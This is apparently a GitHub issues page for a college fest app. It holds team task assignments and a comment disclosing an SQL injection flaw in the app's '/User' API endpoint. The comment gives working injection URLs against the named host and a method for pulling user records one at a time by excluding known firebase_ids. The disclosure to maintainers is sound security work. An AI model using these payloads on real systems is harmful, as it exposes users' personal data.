appteam-nith / hillffair2k18 Goto Github PK

• @Vishal17599 @naman99lalit make/copy code (not UI) to choose an image from phone gallery and convert to byte array
• @utkarshsingh99 make sure you keep the endpoints and key values same :)
• @Alisha1116 @ArjunLuam Try finishing spin wheel by staturday, no fancy UI just normal implementation. We will see the UI later
• @tanvi003 coordinate with @Abhinavlamba and just make a basic implementation of Tambola. Again no fancy UI we will see that later this week. Just make a functioning game.
• @AnshuAkansha choose between spin wheel and Tambola and start working with them.
• FirstYear make questions first. That is the priority.

Try wrapping this up by Saturday.
Work on separate branches
Don't work on master branch
Don't waste time on UI. We just want implementation

sorry for posting it here , it is for the app of latest eir , but you guys removed it so ....
(wise decision btw)

hey ! you guys changed the implementation , which might have removed the db wipeout threat and
thats a good thing . i guess you also tweaked /User handler , but with all respect ,
there are still some loop holes and traversing is still possible
for example this link .

http://api.hillffair.com/User/5'%20OR%201=1%20--'

this statement will give you top row of the table
now you have data of first person
now you need to select every one else , but the first person

say its firebase_id is 0akwYovxZnf8h6Ja12gj28OzWEr1
now you need to select every body who is not first person

http://api.hillffair.com/User/5'%20OR%20(1=1%20AND%20firebase_id%20!=%20%220akwYovxZnf8h6Ja12gj28OzWEr1%22%20%20)%20--'

( 5 ' OR (1=1 AND firebase_id != "0akwYovxZnf8h6Ja12gj28OzWEr1" ))

which is just like adding inner boolian operations
now you have 2 person's data
now do the same to get the third one , select everybody who is not first and not second

just like that ! ezpz .
but later ,i found that "/leaderboard" also does the same thing . which gives me feeling dat "content security" is NOT the perpose app and as it is a intercollege project it is not even
necessary (but still i suggest , we should try our best to make our product standouu )

still i liked traversing thingy i made :P (seriously i made it myself), and also plz dont hate me , ill NOT try to do any unethical thing with the app . app is yours and yours only <3 .

tell me if i should delete this or not , or in case you want me to stop interfering with your club's decision !?